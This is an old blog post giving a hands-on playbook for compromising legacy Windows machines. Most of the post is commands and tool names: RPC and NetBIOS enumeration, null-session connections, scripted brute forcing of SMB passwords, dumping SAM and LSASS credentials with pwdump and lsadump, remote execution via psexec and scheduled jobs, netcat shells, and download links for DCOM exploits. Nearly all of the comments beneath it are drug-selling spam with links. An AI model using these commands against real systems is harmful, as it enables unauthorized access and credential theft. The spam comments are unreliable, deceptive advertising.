Taking Network Security to the Streets: Hacking Old Skoolz Windows

Saturday, June 16, 2007

Hacking Old Skoolz Windows

Port 135 (client-server communications)

Port 139, 445 (authentication and file sharing)

Port 137,138 (NetBIOS browser, name and lookup functions)

Look for port 135 endpoint mapping which includes, Microsoft Outlook, Exchange and Messenger Service.

Nmap server to look for port 135

Run rpcscan or epdump on server over port tcp or udp port 135

If udp port 1028, 1029 opened or tcp port 1025 opened, run rpcscan over those ports

Look for IFID 12345778-1234-abcd-ef00-0123456789ab and 12345778-1234-abcd-ef00-0123456789ac for both LSA and SAMR interface respectively. Can be found on all Windows NT OS using name pipes accessible through SMB session over TCP port 139 or 445.

Run walksam query if SMAR interface is present to glean user information.

Run rpcclient from backtrack if a valid username and password is given. LSARPC interface must be present

Compromise admin password using brute force tool WMICracker.

Use Remoxec to execute arbitrary commands.

Verify if server is vulnerable for RPC DCOM exploits. If patch MS03-026 and MS03-039 is applied, nothing can be done. Else download exploits from

http://packetstormsecurity.org/0307-exploits/dcom.c
http://packetstormsecurity.org/0307-exploits/DComExpl_UnixWin32.zip
http://packetstormsecurity.org/0307-exploits/rpcdcom.101.zip
http://packetstormsecurity.org/0307-exploits/oc192-dcom.c
http://examples.oreilly.com/networksa/tools/dcom-exploits.zip
http://www.securityfocus.com/bid/8205/exploit/

DCOM interface can be exploited through:

TCP and UDP port 135 (through RPC server service)
TCP ports 139 and 445 (through SMB and named pipes)
TCP port 593 (through COM Internet Services, if installed)
Use kaHt2 to exploit a remote shell
Use SPKIE msrpcfuzz fuzzer to do stress test.

-----------------------------------------------------------------------------------------

NetBIOS Name Service UDP port 137

Dumping NetBIOS table: Nbtstat –A 192.168.1.152

Local Area Connection:
Node IpAddress: [192.168.1.20] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
CARAA <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
CARAA <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered

MAC Address = 00-0D-88-CB-30-0B

------------------------------------------------

<00> unique hostname
<00> group domain name
<03> unique Messenger service running for that computer
<03> unique Messenger service running for that individual logged in user
<20> unique Server service running
<1D> group Master browser name for the subnet
<1B> unique Domain master browser name, identifies PDC for that domain
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0661

NetBIOS Datagram Service UDP port 138
http://www.securityfocus.com/advisories/2556

NetBIOS Session Service TCP port 139

Connect through null session:

net use \\192.168.1.152\IPC$ “” /user:””
net view \\192.168.1.152
Use tools like enum, GetAcct and winfo to enumerate more info.

Brute force user password through NetBIOS session service with tools like SMBCrack and SMB-AT or use Windows LOOP to find password.

1. Create a file credentials.txt with username and password:

Password Username
“” Administrator
Password Administrator
Admin Administrator

2. FOR /F “tokens=1,2*” %i in (credentials.txt) do net use \\192.168.1.152\IPC$ %i /user:%j

3. Using the NetBIOS tool with LOOP
FOR /L %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt 192.168.1.%i > out.txt

Connect through valid user:
Smbclient to enumerate more info.
net use \\192.168.1.152\C$ * /user:scadmin (Will prompt for a password)
net use \\192.168.1.152\C$ ronald3211 /user:scadmin
at \\192.168.1.152 00:04 c:\Windows\system32\cmd.exe

Modify and accessing registry keys using
Regdmp.exe
Regini.exe
Reg.exe

Accessing the SAM Database and LSASS

Pwdump5
Lsadump2

CIFS Service running on TCP and UDP port 445

SMB-AT to enumerate user and system info.
Smbserverscan to scan for smb related ports.
Smbgetserverinfo to get server info.
smbNAT to provide more details about the server info.

Smbdumpusers to enumerate port 139 and 445.
Smbdumpusers –i 192.168.1.152 –m 2 –P1

Smbbf to brute-force password grinding attacks against both NetBIOS and CIFS services.
Smbbf –i 192.168.1.152 –p wordlist.txt –u users.txt –v –P1

Need to have admin user name and password.
Samrdump to list all username in server
Rpcdump to list all endpoint bindings

Registry path for null session: HKLM\SYSTEM\CurrentControlSet\Control\Lsa
Restrictanonymous =0, 1, 2

Use pwdump5 to capture SAM file.
Use netcat to open a shell on remote OS
Use psexec through port 139 or 445 to execute command
Psexec \\192.168.1.152 –u Admin –p password –s cmd.exe

IIS buffer overflow

IIS 5.0 SSL Remote root exploit use thciisslame

32 comments:

Anonymous said...: Hoh ... lam00 & n00b; June 26, 2007 at 7:21 AM
Anonymous said...: Can anyone recommend the top Patch Management tool for a small IT service company like mine? Does anyone use Kaseya.com or GFI.com? How do they compare to these guys I found recently: N-able N-central network security software
? What is your best take in cost vs performance among those three? I need a good advice please... Thanks in advance!; December 19, 2009 at 7:21 PM
Anonymous said...: Amiable fill someone in on and this fill someone in on helped me alot in my college assignement. Thank you seeking your information.; August 14, 2010 at 11:14 AM
viagra online said...: I wasn't aware that people still were trying to hack windows, Ill bet that it is quite a challenge, good luck on that.; January 11, 2011 at 1:24 AM
Anonymous said...: buy tramadol online can you buy tramadol over the counter in the usa - tramadol 85 93; February 20, 2013 at 1:05 PM
Anonymous said...: buy tramadol online buy tramadol in dubai - get through tramadol withdrawal; February 21, 2013 at 9:45 AM
Anonymous said...: buy xanax online without rx mentax (generic xanax) - xanax dosage weight dogs; February 21, 2013 at 7:56 PM
Anonymous said...: buy tramadol online tramadol hcl for dogs - tramadol reactions; February 23, 2013 at 10:11 AM
Anonymous said...: tramadol 50mg if you overdose tramadol - online pharmacy tramadol overnight; February 23, 2013 at 11:43 AM
Anonymous said...: buy tramadol online mekanisme kerja tramadol hcl - tramadol overdose symptoms dogs; February 24, 2013 at 6:55 PM
Anonymous said...: buy tramadol online gettin high on tramadol - tramadol hcl para que serve; February 25, 2013 at 11:03 AM
Anonymous said...: buy cheap carisoprodol soma carisoprodol tablets dosage - what is carisoprodol 350 mg for; February 25, 2013 at 11:46 PM
Anonymous said...: Aw, this was a very nice post. Finding the time and
actual effort to make a superb article… but what
can I say… I put things off a lot and don't seem to get anything done.

My web site MEDAL OF HONOR WARFIGHTER mods; February 26, 2013 at 10:34 AM
Anonymous said...: buy tramadol online order tramadol overnight mastercard - tramadol ingredients; February 27, 2013 at 11:46 PM
Anonymous said...: buy tramadol online tramadol addiction message board - information on tramadol 50mg tablets; February 28, 2013 at 7:44 AM
Anonymous said...: cialis online cialis going generic - generic cialis tadalafil reviews; February 28, 2013 at 10:09 AM
Anonymous said...: buy cialis online cheap cialis without rx - buy cialis levitra; March 1, 2013 at 1:44 PM
Anonymous said...: buy cialis online cialis 5mg. price in usa - can i buy cialis over the counter in the us; March 2, 2013 at 6:55 AM
Anonymous said...: order tramadol no prescription tramadol hcl 50 mg ingredients - tramadol hcl 50 mg tablet; March 5, 2013 at 4:55 PM
Anonymous said...: buy tramadol tablets tramadol 50 mg can you get high - buy tramadol egypt; March 6, 2013 at 5:46 PM
Anonymous said...: http://landvoicelearning.com/#57594 tramadol for cats overdose - buy tramadol online by cod; March 10, 2013 at 1:10 AM
Anonymous said...: buy tramadol buy tramadol store - where to buy tramadol online forum; March 10, 2013 at 2:30 AM
Anonymous said...: tramadol online buy 180 tramadol online - tramadol 100 mg experience; March 10, 2013 at 4:12 PM
Anonymous said...: http://reidmoody.com/#79166 ativan withdrawal alcohol - ativan buzz; March 12, 2013 at 6:49 AM
Anonymous said...: buy ativan online side effects of .5 ativan - ativan high how much; March 13, 2013 at 6:54 PM
Anonymous said...: Your oωn repогt has confіrmed necеssary to uѕ.
It’s νегy eԁucational and уou reаlly
are naturаlly гeally experienced οf this tyρe.
You have got οpenеԁ up my ρеrѕοnal еyе іn orԁer to vаriouѕ ѵiews on this kind of subject using
іntriquing, notable and sοund written сοntеnt.
Feel free to visit my web-site : Buy Valium; March 14, 2013 at 3:14 AM
Anonymous said...: buy ativan online lorazepam 1 mg mylan - effects of ativan addiction; March 14, 2013 at 11:44 AM
Anonymous said...: ways to buy ativan online ativan effects - order ativan canada; March 15, 2013 at 2:59 AM
Anonymous said...: buy tramadol online with mastercard buy tramadol ships florida - tramadol hcl percocet; March 18, 2013 at 6:33 PM
Anonymous said...: buy tramadol online tramadol overdose info - what is ultram tramadol hcl; March 20, 2013 at 7:24 PM
Anonymous said...: xanax online 1mg xanax 1 beer - 2mg xanax and 2 beers; March 27, 2013 at 12:19 AM
Anonymous said...: http://www.achildsplace.org/banners/tramadolonline/#5744 order tramadol online mastercard - buy tramadol online mastercard overnight; May 13, 2013 at 2:05 PM

Taking Network Security to the Streets

Saturday, June 16, 2007

Hacking Old Skoolz Windows

32 comments:

My Links

Email

My Profile

My Blog Archive

CCSP

CCNA

CQS-CFS

CQS-VPNS

CQS-IDSS

OCP

OCA

CNSS

CEH

CIW

hackathology